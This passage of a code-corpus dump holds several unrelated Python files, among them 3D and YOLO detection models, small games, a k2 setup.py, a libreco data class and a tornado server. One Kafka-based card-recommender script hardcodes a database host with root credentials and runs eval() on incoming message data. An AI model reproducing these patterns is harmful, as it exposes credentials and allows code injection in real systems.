Conv2d(128, 128, 3, 1, 1))\n \n self.deconv_3 = nn.Sequential(nn.ConvTranspose2d(128, 256, 1, 1, 0),\n nn.BatchNorm2d(256))\n \n self.block_2 = nn.Sequential(Conv2d(128, 128, 3, 2, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1))\n \n self.deconv_2 = nn.Sequential(nn.ConvTranspose2d(128, 256, 2, 2, 0),\n nn.BatchNorm2d(256))\n \n self.block_3 = nn.Sequential(Conv2d(128, 256, 3, 2, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1))\n\n self.deconv_1 = nn.Sequential(nn.ConvTranspose2d(256, 256, 4, 4, 0),\n nn.BatchNorm2d(256))\n \n \n\n self.score_head = Conv2d(768, anchor_per_pos, 1, 1, 0, activation=False, batch_norm=False)\n self.reg_head = Conv2d(768, 7 * anchor_per_pos, 1, 1, 0, activation=False, batch_norm=False)\n\n def forward(self,x):\n x 
= self.block_1(x)\n x_decon_bloc1 = x\n x = self.block_2(x)\n x_decon_bloc2 = x\n x = self.block_3(x)\n x = torch.cat((self.deconv_1(x),self.deconv_2(x_decon_bloc2),self.deconv_3(x_decon_bloc1)),1)\n return self.score_head(x),self.reg_head(x)\n\nclass VoxelNet(nn.Module):\n def __init__(self):\n super(VoxelNet, self).__init__()\n self.svfe = SVFE()\n self.cml = ConvoMidLayer()\n self.rpn = RPN()\n \n def voxelize(self, sparse_features, coords):\n dim = sparse_features.shape[-1]\n if if_cuda:\n dense_feature = Variable(torch.zeros(dim, batch_size, D, H, W).cuda())\n else:\n dense_feature = Variable(torch.zeros(dim, batch_size, D, H, W))\n dense_feature[:, coords[:,0], coords[:,1], coords[:,2], coords[:,3]]= sparse_features.transpose(1,0)\n return dense_feature.transpose(0,1)\n\n def forward(self, voxel_features, voxel_coords):\n # feature learning network\n vwfs = self.svfe(voxel_features)\n vwfs = self.voxelize(vwfs,voxel_coords)\n psm,rm = self.rpn(self.cml(vwfs).view(batch_size, -1, H, W))\n return psm, rm\n","sub_path":"VoxelNet1.py","file_name":"VoxelNet1.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"383863570","text":"import time\nfrom absl import app, flags, logging\nfrom absl.flags import FLAGS\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom yolov3_tf2.models import (\n YoloV3, YoloV3Tiny\n)\nfrom yolov3_tf2.dataset import transform_images, load_tfrecord_dataset\nfrom yolov3_tf2.utils import draw_outputs\nimport zetane\n\nflags.DEFINE_string('classes', './data/coco.names', 'path to classes file')\nflags.DEFINE_string('weights', './checkpoints/yolov3.tf',\n 'path to weights file')\nflags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')\nflags.DEFINE_integer('size', 416, 'resize images to')\nflags.DEFINE_string('image', './data/girl.png', 'path to input image')\nflags.DEFINE_string('tfrecord', None, 'tfrecord instead of image')\nflags.DEFINE_string('output', './output.jpg', 'path to output image')\nflags.DEFINE_integer('num_classes', 80, 'number of classes in the model')\n\ndef make_io_panels(zctxt):\n input_panel = zctxt.panel('Input', width=0.25, height=0.3, screen_x=0.0, screen_y=0.7, navigation='2d').set_camera(position=(\n 1, 0.75, 30), aim=(1, 0.75, 0)).set_background_color(rgb=(0.025, 0.02, 0.045)).border(3).set_border_alpha(0.05).update()\n output_panel = zctxt.panel('Output', width=0.25, height=0.3, screen_x=0.0, screen_y=0.0, navigation='2d').set_camera(position=(\n 1, 0.75, 30), aim=(1, 0.75, 0)).set_background_color(rgb=(0.025, 0.02, 0.045)).border(3).set_border_alpha(0.05).update()\n zctxt.text(\"Input\").font_size(0.1).position(y=-.45).send_to(input_panel).update()\n zctxt.text(\"Output\").font_size(.1).position(y=-.45).send_to(output_panel).update()\n return input_panel, output_panel\n\ndef main(_argv):\n physical_devices = tf.config.experimental.list_physical_devices('GPU')\n for physical_device in physical_devices:\n tf.config.experimental.set_memory_growth(physical_device, True)\n\n if FLAGS.tiny:\n yolo = YoloV3Tiny(classes=FLAGS.num_classes)\n else:\n yolo = YoloV3(classes=FLAGS.num_classes)\n\n yolo.load_weights(FLAGS.weights).expect_partial()\n logging.info('weights loaded')\n\n class_names = [c.strip() for c in open(FLAGS.classes).readlines()]\n logging.info('classes loaded')\n\n if FLAGS.tfrecord:\n dataset = load_tfrecord_dataset(\n FLAGS.tfrecord, FLAGS.classes, FLAGS.size)\n dataset = dataset.shuffle(512)\n img_raw, _label = 
next(iter(dataset.take(1)))\n else:\n img_raw = tf.image.decode_image(\n open(FLAGS.image, 'rb').read(), channels=3)\n\n img = tf.expand_dims(img_raw, 0)\n img = transform_images(img, FLAGS.size)\n\n ctxt = zetane.Context()\n ctxt.clear_universe()\n\n input_panel, output_panel = make_io_panels(ctxt)\n image_np = np.transpose(img.numpy(), (1, 2, 3, 0))\n to_fit = 0.15 / image_np.shape[2]\n zinput = ctxt.image().data(image_np).scale(to_fit, to_fit).send_to(input_panel).update()\n zmodel = ctxt.model().keras(yolo).inputs(img.numpy()).update()\n\n t1 = time.time()\n #boxes, scores, classes, nums = yolo(img)\n bbox, confidence, class_probs, scores = yolo(img)\n boxes, scores, classes, nums = tf.image.combined_non_max_suppression(\n boxes=tf.reshape(bbox, (tf.shape(bbox)[0], -1, 1, 4)),\n scores=tf.reshape(\n scores, (tf.shape(scores)[0], -1, tf.shape(scores)[-1])),\n max_output_size_per_class=FLAGS.yolo_max_boxes,\n max_total_size=FLAGS.yolo_max_boxes,\n iou_threshold=FLAGS.yolo_iou_threshold,\n score_threshold=FLAGS.yolo_score_threshold\n )\n\n t2 = time.time()\n logging.info('time: {}'.format(t2 - t1))\n\n logging.info('detections:')\n for i in range(nums[0]):\n logging.info('\\t{}, {}, {}'.format(class_names[int(classes[0][i])],\n np.array(scores[0][i]),\n np.array(boxes[0][i])))\n\n #out_img = cv2.cvtColor(img_raw.numpy(), cv2.COLOR_RGB2BGR)\n out_img = draw_outputs(img_raw.numpy()/225.0, (boxes, scores, classes, nums), class_names)\n\n to_fit = 0.15 / out_img.shape[2]\n zoutput = ctxt.image().data(out_img).scale(to_fit, to_fit).send_to(output_panel).update()\n #cv2.imwrite(FLAGS.output, img)\n #logging.info('output saved to: {}'.format(FLAGS.output))\n\n ctxt.disconnect()\n\nif __name__ == '__main__':\n try:\n app.run(main)\n except SystemExit:\n pass\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115109399","text":"# Guess My Number\n#\n# Modify the Guess My Number chapter project from Chapter 3\n# by reusing the function ask_number().\n\nimport random\n\ndef ask_number(question, low, high, step=1):\n \"\"\"Ask for a number within a range\"\"\"\n response = None\n while response not in range(low, high, step):\n response = int(input(question))\n return response\n\ndef main():\n\tprint(\"\\tWelcome to 'Guess My Number'!\")\n\tprint(\"\\nI'm thinking of a number between 1 and 100.\")\n\tprint(\"Try to guess it in as few attempts as possible.\")\n\tprint(\"you only have 8 guesses so choose wisely.\\n\")\n\n\t# set the initial values\n\tthe_number = random.randint(1, 100)\n\tguess = ask_number(\"Take a guess(improved): \", 1, 101)\n\ttries = 1\n\n\twhile guess != the_number:\n\t\t\n\t\tif tries == 8:\n\t\t\tbreak\n\t\t\n\t\tif guess > the_number:\n\t\t\tprint(\"Lower...\")\n\t\telse:\n\t\t\tprint(\"Higher...\")\n\t\t\n\t\tguess = ask_number(\"Take a guess(improved): \", 1, 101)\n\t\ttries += 1\n\n\tif guess == the_number:\n\t\tprint(\"\\nYou guessed it! The number was\", the_number)\n\t\tprint(\"And it only took you\", tries, \"tries!\\n\")\n\telse:\n\t\tprint(\"\\nYou failed you idiot! 
The number was\", the_number, \"\\n\")\n\t\t\n\t\t\n\t\t\n\tinput(\"\\n\\nPress the enter key to exit.\")\n\t\nmain()\n","sub_path":"MyChallengeCode/ch6/guess_my_number_functions.py","file_name":"guess_my_number_functions.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260172837","text":"import tkinter as tk\r\nimport random\r\nimport os\r\n\r\ndirname = os.path.dirname(__file__)\r\n\r\n# fenetre\r\n \r\nwindow = tk.Tk()\r\nwindow.title(\"Chifoumi\")\r\nwindow.geometry(\"400x400\")\r\nwindow.config(bg=\"#7FD7DF\")\r\nwindow.iconbitmap(os.path.join(dirname, 'assets/ico.ico'))\r\nwindow.resizable(width=False, height=False)\r\n\r\n# images\r\n\r\ncanvas = tk.Canvas(window, width=340, height=150, bg=\"#7FD7DF\")\r\n\r\nimg11 = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel vs chisel.png\"))\r\nimg12 = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel vs leaf.png\"))\r\nimg13 = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel vs pierre.png\"))\r\n\r\nimg21 = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf vs chisel.png\"))\r\nimg22 = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf vs leaf.png\"))\r\nimg23 = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf vs pierre.png\"))\r\n\r\nimg31 = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre vs chisel.png\"))\r\nimg32 = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre vs leaf.png\"))\r\nimg33 = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre vs pierre.png\"))\r\n\r\n# choix et scores\r\n\r\nuser_score = 0\r\nscript_score = 0\r\n\r\ndef add_user_score():\r\n \r\n global user_score, script_score\r\n user_score += 1\r\n\r\n label_user_score = tk.Label(window, text=user_score, bg=\"#7FD7DF\", font=(\"Helvetica\", 25), fg='white')\r\n label_user_score.place(x=75, y=18)\r\n\r\ndef add_script_score():\r\n \r\n global user_score, script_score\r\n script_score += 1\r\n\r\n label_script_score = tk.Label(window, text=script_score, bg=\"#7FD7DF\", font=(\"Helvetica\", 25), fg='white')\r\n label_script_score.place(x=298, y=18)\r\n\r\ndef choose_chisel():\r\n\r\n label_you = tk.Label(window, text=\"You :\", bg=\"yellow\")\r\n label_you.place(x=30, y=30)\r\n\r\n label_you = tk.Label(window, text=\"AI :\", bg=\"yellow\")\r\n label_you.place(x=260, y=30)\r\n \r\n label_welcome.destroy()\r\n script_tool = random.randint(1, 3)\r\n user_tool = 1\r\n\r\n if user_tool == 1 and script_tool == 1:\r\n image1 = canvas.create_image(170,77, image=img11)\r\n canvas.place(x=30, y=80)\r\n\r\n elif user_tool == 1 and script_tool == 2:\r\n image2 = canvas.create_image(170,77, image=img12)\r\n canvas.place(x=30, y=80)\r\n add_user_score()\r\n\r\n elif user_tool == 1 and script_tool == 3:\r\n image3 = canvas.create_image(170,77, image=img13)\r\n canvas.place(x=30, y=80)\r\n add_script_score()\r\n\r\ndef choose_leaf():\r\n \r\n global user_score, script_score\r\n\r\n label_you = tk.Label(window, text=\"You :\", bg=\"yellow\")\r\n label_you.place(x=30, y=30)\r\n\r\n label_you = tk.Label(window, text=\"AI :\", bg=\"yellow\")\r\n label_you.place(x=260, y=30)\r\n\r\n label_welcome.destroy()\r\n script_tool = random.randint(1, 3)\r\n user_tool = 2\r\n\r\n if user_tool == 2 and script_tool == 1:\r\n image1 = canvas.create_image(170,77, image=img21)\r\n canvas.place(x=30, y=80)\r\n add_script_score()\r\n\r\n elif user_tool == 2 and script_tool == 2:\r\n image2 = canvas.create_image(170,77, image=img22)\r\n 
canvas.place(x=30, y=80)\r\n\r\n elif user_tool == 2 and script_tool == 3:\r\n image3 = canvas.create_image(170,77, image=img23)\r\n canvas.place(x=30, y=80)\r\n add_user_score()\r\n\r\ndef choose_pierre():\r\n\r\n global user_score, script_score\r\n\r\n label_you = tk.Label(window, text=\"You :\", bg=\"yellow\")\r\n label_you.place(x=30, y=30)\r\n\r\n label_you = tk.Label(window, text=\"AI :\", bg=\"yellow\")\r\n label_you.place(x=260, y=30)\r\n \r\n label_welcome.destroy()\r\n script_tool = random.randint(1, 3)\r\n user_tool = 3\r\n\r\n if user_tool == 3 and script_tool == 1:\r\n image1 = canvas.create_image(170,77, image=img31)\r\n canvas.place(x=30, y=80)\r\n add_user_score()\r\n\r\n elif user_tool == 3 and script_tool == 2:\r\n image2 = canvas.create_image(170,77, image=img32)\r\n canvas.place(x=30, y=80)\r\n add_script_score()\r\n \r\n elif user_tool == 3 and script_tool == 3:\r\n image3 = canvas.create_image(170,77, image=img33)\r\n canvas.place(x=30, y=80)\r\n\r\n# buttons\r\n\r\nimage_chisel = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel.png\"))\r\nbutton_chisel = tk.Button(window, image=image_chisel, width=100, height=100, command=choose_chisel)\r\nbutton_chisel.place(x=270, y=270)\r\n\r\nimage_leaf = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf.png\"))\r\nbutton_leaf = tk.Button(window, image=image_leaf, width=100, height=100, command=choose_leaf)\r\nbutton_leaf.place(x=150, y=270)\r\n\r\nimage_pierre = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre.png\"))\r\nbutton_pierre = tk.Button(window, image=image_pierre, width=100, height=100, command=choose_pierre)\r\nbutton_pierre.place(x=30, y=270)\r\n\r\n# welcome\r\n\r\nlabel_choose_weapon = tk.Label(window, text=\"Choose your weapon :\", bg=\"#7FD7DF\")\r\nlabel_choose_weapon.place(x=135, y=221)\r\n\r\nlabel_welcome = tk.Label(window, text=\"Welcome !\", bg=\"#7FD7DF\", font=(\"Helvetica\", 30, \"italic bold\"), fg='white')\r\nlabel_welcome.place(x=103, y=110)\r\n\r\nwindow.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"558381389","text":"import pandas as pd\nimport json\nimport re\nimport pymongo\nimport jieba\nimport operator\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport uuid\nfrom confluent_kafka import Consumer\n\n\nclient = pymongo.MongoClient(host='123.241.175.34', port=27017)\nclient.admin.authenticate('root','1qaz@WSX3edc')\ndb = client.Recommend_card\ncoll = db.no_card\nmondata = list(coll.find())\ncard_df = pd.DataFrame(mondata)\ncard_df.set_index('卡名', inplace=True)\ndel card_df['_id']\nprops = {'bootstrap.servers': 'kafka:9092', 'group.id': 'test3', 'auto.offset.reset': 'earliest',\n 'session.timeout.ms': 6000}\nconsumer = Consumer(props)\ntopicName = \"nocard\"\nconsumer.subscribe([topicName])\nwhile True:\n records = consumer.consume()\n if records is None:\n continue\n else:\n for record in records:\n msgKey = record.key().decode('utf-8')\n msgValue = record.value().decode('utf-8')\n data = eval(msgValue)\n id = data[\"id\"]\n a = data[\"卡活動\"]\n b = data[\"保險\"]\n c = data[\"加油\"]\n d = data[\"行動支付\"]\n e = data[\"超商\"]\n f = data[\"交通\"]\n g = data[\"電影\"]\n h = data[\"旅遊機票飯店\"]\n i = data[\"網購\"]\n j = data[\"繳稅繳費\"]\n k = data[\"現金回饋\"]\n list01 = [a, b, c, d, e, f, g, h, i, j, k]\n for n, i in enumerate(list01):\n if i == '':\n list01[n] = 0\n else:\n list01[n] = int(i)\n INP = 
pd.DataFrame(columns=['卡活動', '保險', '加油', '行動支付', '超商', '交通', '電影', '旅遊機票飯店', '網購', '繳稅繳費', '現金回饋'])\n list02 = []\n if sum(list01) == 0:\n list02 = [0] * len(INP.columns)\n INP.loc[0] = list02\n\n else:\n for i in list01:\n l02 = i / sum(list01)\n list02.append(l02)\n INP.loc[0] = list02\n # 計算相似度\n x = cosine_similarity(card_df, INP)\n # print(x)\n a = list(x)\n b = sorted(a, reverse=True)\n blist = b[0:3]\n blist\n c = []\n if sum(blist) == 0:\n print(card_df.index[[12, 77, 101]])\n result = {\"id\": id, \"card1\": card_df.index[12], \"card2\": card_df.index[77], \"card3\": card_df.index[101]}\n coll2 = db.no_card_result\n coll2.insert_one(result)\n client.close()\n else:\n for i in blist:\n d = a.index(i)\n c.append(d)\n print(list(card_df.index[c]))\n card = list(card_df.index[c])\n result = {\"id\": id, \"card1\": card[0], \"card2\": card[1], \"card3\": card[2]}\n coll2 = db.no_card_result\n coll2.insert_one(result)\n client.close()\n","sub_path":"linechatbot/flask/nocard.py","file_name":"nocard.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123796830","text":"# Welcome to the k2 setup.py.\n#\n# Please follow instructions in scripts/build_pip.sh to use this file.\n#\nimport datetime\nimport re\nimport setuptools\nimport sys\n\nif sys.version_info < (3,):\n print('Python 2 has reached end-of-life and is no longer supported by k2.')\n sys.exit(-1)\n\nif sys.version_info < (3, 6):\n print('Python 3.5 has reached end-of-life on September 13th, 2020 '\n 'and is no longer supported by k2.')\n sys.exit(-1)\n\n# Refer to https://stackoverflow.com/questions/45150304/how-to-force-a-python-wheel-to-be-platform-specific-when-building-it\n# for why to introduce `bdist_wheel`.\n#\n# With `bdist_wheel`, the final wheel name looks like `k2-0.0.1.dev20201104-cp37-cp37m-linux_x86_64.whl`\ntry:\n from wheel.bdist_wheel import bdist_wheel as _bdist_wheel\n\n class bdist_wheel(_bdist_wheel):\n\n def finalize_options(self):\n _bdist_wheel.finalize_options(self)\n self.root_is_pure = False\nexcept ImportError:\n bdist_wheel = None\n\n\ndef get_long_description():\n with open('README.md', 'r') as f:\n long_description = f.read()\n return long_description\n\n\ndef get_cuda_version():\n import torch\n from torch.utils import collect_env\n running_cuda_version = collect_env.get_running_cuda_version(\n collect_env.run)\n cuda_version = torch.version.cuda\n if running_cuda_version is not None:\n assert cuda_version in running_cuda_version, \\\n f'PyTorch is built with CUDA version: {cuda_version}.\\n' \\\n f'The current running CUDA version is: {running_cuda_version}'\n cuda_version = cuda_version.split('.')\n major, minor = int(cuda_version[0]), int(cuda_version[1])\n cuda_version = major * 10 + minor\n return f'{cuda_version}'\n\n\ndef get_package_version():\n # Set a default CUDA version here so that `pip install k2`\n # uses the default CUDA version.\n #\n # `pip install k2==x.x.x+cu100` to install k2 with CUDA 10.0\n #\n default_cuda_version = '101' # CUDA 10.1\n cuda_version = get_cuda_version()\n if default_cuda_version != cuda_version:\n cuda_version = f'+cu{cuda_version}'\n else:\n cuda_version = ''\n\n with open('CMakeLists.txt') as f:\n content = f.read()\n\n latest_version = re.search(r'set\\(K2_VERSION (.*)\\)', content).group(1)\n latest_version = latest_version.strip('\"')\n\n dt = datetime.datetime.utcnow()\n package_version = 
f'{latest_version}{cuda_version}.dev{dt.year}{dt.month:02d}{dt.day:02d}'\n return package_version\n\n\ndef get_short_description():\n return 'FSA/FST algorithms, intended to (eventually) be interoperable with PyTorch and similar'\n\n\nwith open('k2/python/k2/__init__.py', 'a') as f:\n f.write(f\"__dev_version__ = '{get_package_version()}'\\n\")\n\ndev_requirements = [\n 'clang-format==9.0.0',\n 'flake8==3.8.3',\n 'yapf==0.27.0',\n]\n\nsetuptools.setup(\n python_requires='>=3.6',\n name='k2',\n version=get_package_version(),\n author='Daniel Povey',\n author_email='dpovey@gmail.com',\n keywords='k2, FSA, FST',\n description=get_short_description(),\n long_description=get_long_description(),\n long_description_content_type='text/markdown',\n url='https://github.com/k2-fsa/k2',\n package_dir={\n 'k2': 'k2/python/k2',\n 'k2.ragged': 'k2/python/k2/ragged',\n 'k2.sparse': 'k2/python/k2/sparse',\n },\n packages=['k2', 'k2.ragged', 'k2.sparse'],\n install_requires=['torch', 'graphviz'],\n extras_require={'dev': dev_requirements},\n data_files=[('', ['LICENSE'])],\n cmdclass={'bdist_wheel': bdist_wheel},\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: C++',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Operating System :: OS Independent',\n ],\n)\n\n# remove the line __dev_version__ from k2/python/k2/__init__.py\nwith open('k2/python/k2/__init__.py', 'r') as f:\n lines = f.readlines()\n\nwith open('k2/python/k2/__init__.py', 'w') as f:\n for line in lines:\n if '__dev_version__' not in line:\n f.write(line)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"164771107","text":"ncolums = 2\nnfilas = 4\nmatriz = [[0] * ncolums for i in range(nfilas)]\nmatriz[0][0] = \"Pera\"\nmatriz[0][1] = \"Manzana\"\nmatriz[1][0] = \"Naranja\"\nmatriz[1][1] = \"Fresa\"\nmatriz[2][0] = \"Patilla\"\nmatriz[2][1] = \"Uva\"\nmatriz[3][0] = \"Mandarina\"\nmatriz[3][1] = \"Kiwi\"\n\nprint(matriz)","sub_path":"matrizprueba.py","file_name":"matrizprueba.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346130256","text":"from base64 import *\r\n\r\n# we have 'a' as multiple line string\r\na = '''\r\n\r\nhello\r\n\r\n''' # string ended here\r\n\r\na = str.encode(a) # string to byte-like object\r\na = b64encode(a) # b64 encoded\r\n\r\nprint('encoded: ',a)\r\n\r\na = b64decode(a) # b64 decoded\r\na = a.decode() # byte-like object to string\r\n\r\nprint('decoded: ',a)\r\n\r\n\r\n","sub_path":"encoding-multiple-lines.py","file_name":"encoding-multiple-lines.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"77171433","text":"from array import array\nfrom collections import defaultdict, namedtuple\nimport inspect\nimport json\nimport os\nimport numpy as np\nimport pandas as pd\n\n\nFeature = namedtuple(\"Feature\", [\"name\", \"index\"])\nEmpty_Feature = Feature(name=[], index=[])\n\n\nclass DataInfo(object):\n def __init__(\n self,\n col_name_mapping=None,\n interaction_data=None,\n user_sparse_unique=None,\n user_dense_unique=None,\n item_sparse_unique=None,\n item_dense_unique=None,\n user_indices=None,\n item_indices=None\n ):\n 
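# keep the raw interaction table and the per-field unique feature matrices for fast lookups\n 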
self.col_name_mapping = col_name_mapping\n self.interaction_data = interaction_data\n self.user_sparse_unique = user_sparse_unique\n self.user_dense_unique = user_dense_unique\n self.item_sparse_unique = item_sparse_unique\n self.item_dense_unique = item_dense_unique\n self.user_consumed, self.item_consumed = DataInfo.interaction_consumed(\n user_indices, item_indices\n )\n self._user2id = None\n self._item2id = None\n self._id2user = None\n self._id2item = None\n self.all_args = locals()\n\n @staticmethod\n def interaction_consumed(user_indices, item_indices):\n user_consumed = defaultdict(lambda: array(\"I\"))\n item_consumed = defaultdict(lambda: array(\"I\"))\n for u, i in zip(user_indices, item_indices):\n user_consumed[u].append(i)\n item_consumed[i].append(u)\n return user_consumed, item_consumed\n\n @property\n def global_mean(self):\n return self.interaction_data.label.mean()\n\n @property\n def min_max_rating(self):\n return (\n self.interaction_data.label.min(),\n self.interaction_data.label.max()\n )\n\n @property\n def sparse_col(self):\n if not self.col_name_mapping[\"sparse_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"sparse_col\"].keys()),\n index=list(self.col_name_mapping[\"sparse_col\"].values())\n )\n\n @property\n def dense_col(self):\n if not self.col_name_mapping[\"dense_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"dense_col\"].keys()),\n index=list(self.col_name_mapping[\"dense_col\"].values())\n )\n\n @property\n def user_sparse_col(self):\n if not self.col_name_mapping[\"user_sparse_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"user_sparse_col\"].keys()),\n index=list(self.col_name_mapping[\"user_sparse_col\"].values())\n )\n\n @property\n def user_dense_col(self):\n if not self.col_name_mapping[\"user_dense_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"user_dense_col\"].keys()),\n index=list(self.col_name_mapping[\"user_dense_col\"].values())\n )\n\n @property\n def item_sparse_col(self):\n if not self.col_name_mapping[\"item_sparse_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"item_sparse_col\"].keys()),\n index=list(self.col_name_mapping[\"item_sparse_col\"].values())\n )\n\n @property\n def item_dense_col(self):\n if not self.col_name_mapping[\"item_dense_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"item_dense_col\"].keys()),\n index=list(self.col_name_mapping[\"item_dense_col\"].values())\n )\n\n @property\n def user_col(self):\n # will be sorted by key\n return (\n self.col_name_mapping[\"user_sparse_col\"].keys().__or__(\n self.col_name_mapping[\"user_dense_col\"].keys())\n )\n\n @property\n def item_col(self):\n # will be sorted by key\n return (\n self.col_name_mapping[\"item_sparse_col\"].keys().__or__(\n self.col_name_mapping[\"item_dense_col\"].keys())\n )\n\n @property\n def n_users(self):\n return self.interaction_data.user.nunique()\n\n @property\n def n_items(self):\n return self.interaction_data.item.nunique()\n\n @property\n def user2id(self):\n if self._user2id is None:\n unique = np.unique(self.interaction_data[\"user\"])\n self._user2id = dict(zip(unique, range(self.n_users)))\n self._user2id[-1] = len(unique) # -1 represent new user\n return self._user2id\n\n @property\n def item2id(self):\n if self._item2id is None:\n unique = np.unique(self.interaction_data[\"item\"])\n self._item2id = dict(zip(unique, 
range(self.n_items)))\n self._item2id[-1] = len(unique) # -1 represent new item\n return self._item2id\n\n @property\n def id2user(self):\n if self._id2user is None:\n self._id2user = {j: user for user, j in self.user2id.items()}\n return self._id2user\n\n @property\n def id2item(self):\n if self._id2item is None:\n self._id2item = {j: item for item, j in self.item2id.items()}\n return self._id2item\n\n def __repr__(self):\n n_users = self.n_users\n n_items = self.n_items\n n_labels = len(self.interaction_data)\n return \"n_users: %d, n_items: %d, data sparsity: %.4f %%\" % (\n n_users, n_items, 100 * n_labels / (n_users*n_items)\n )\n\n def get_indexed_interaction(self):\n data = self.interaction_data.copy()\n data.user = data.user.map(self.user2id)\n data.item = data.item.map(self.item2id)\n if data.user.isnull().any():\n data[\"user\"].fillna(self.n_users, inplace=True)\n data[\"user\"] = data[\"user\"].astype(\"int\")\n if data.item.isnull().any():\n data[\"item\"].fillna(self.n_items, inplace=True)\n data[\"item\"] = data[\"item\"].astype(\"int\")\n return data\n\n def save(self, path):\n if not os.path.isdir(path):\n print(f\"file folder {path} doesn't exists, creating a new one...\")\n os.makedirs(path)\n name_mapping_path = os.path.join(path, \"data_info_name_mapping.json\")\n with open(name_mapping_path, 'w') as f:\n json.dump(self.all_args[\"col_name_mapping\"],\n f, separators=(',', ':'))\n\n other_path = os.path.join(path, \"data_info\")\n hparams = dict()\n arg_names = inspect.signature(self.__init__).parameters.keys()\n for arg in arg_names:\n if arg == \"col_name_mapping\" or self.all_args[arg] is None:\n continue\n if arg == \"interaction_data\":\n hparams[arg] = self.all_args[arg].to_numpy()\n else:\n hparams[arg] = self.all_args[arg]\n\n np.savez_compressed(other_path, **hparams)\n\n # noinspection PyTypeChecker\n @classmethod\n def load(cls, path):\n if not os.path.exists(path):\n raise OSError(f\"file folder {path} doesn't exists...\")\n\n hparams = dict()\n name_mapping_path = os.path.join(path, \"data_info_name_mapping.json\")\n with open(name_mapping_path, 'r') as f:\n hparams[\"col_name_mapping\"] = json.load(f)\n\n other_path = os.path.join(path, \"data_info.npz\")\n info = np.load(other_path)\n for arg in info:\n if arg == \"interaction_data\":\n hparams[arg] = pd.DataFrame(\n info[arg], columns=[\"user\", \"item\", \"label\"])\n else:\n hparams[arg] = info[arg]\n\n return cls(**hparams)\n","sub_path":"libreco/data/data_info.py","file_name":"data_info.py","file_ext":"py","file_size_in_byte":7659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105427776","text":"import tornado.ioloop\nimport tornado.web\nimport json\nimport handler\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"Hello, world\")\n self.write('ok')\n\n def post(self):\n data = json.loads(self.request.body, encoding='utf-8')\n self.write('ok')\n handler.handler(data)\n\n\nif __name__ == \"__main__\":\n application = tornado.web.Application([\n (r\"/\", MainHandler),\n ])\n application.listen(50383)\n tornado.ioloop.IOLoop.current().start()\n","sub_path":"messages/messages_server.py","file_name":"messages_server.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228086557","text":"# ../listeners/tick/delays.py\n\n\"\"\"Provides delay functionality using a tick listener.\"\"\"\n\n# 
=============================================================================\n# >> IMPORTS\n# =============================================================================\n# Python Imports\n# Time\nimport time\n\n# Source.Python Imports\n# Hooks\nfrom hooks.exceptions import except_hooks\n# Listeners\nfrom listeners import tick_listener_manager\nfrom listeners import listeners_logger\n\n\n# =============================================================================\n# >> GLOBAL VARIABLES\n# =============================================================================\n# Get the sp.tick.delays logger\nlisteners_tick_delays_logger = listeners_logger.tick.delays\n\n\n# =============================================================================\n# >> CLASSES\n# =============================================================================\nclass Delay(object):\n\n \"\"\"Stores a callback to be called at a later time.\"\"\"\n\n def __init__(self, seconds, callback, *args, **kwargs):\n \"\"\"Called when an instance is instantiated.\"\"\"\n # Log the init message\n 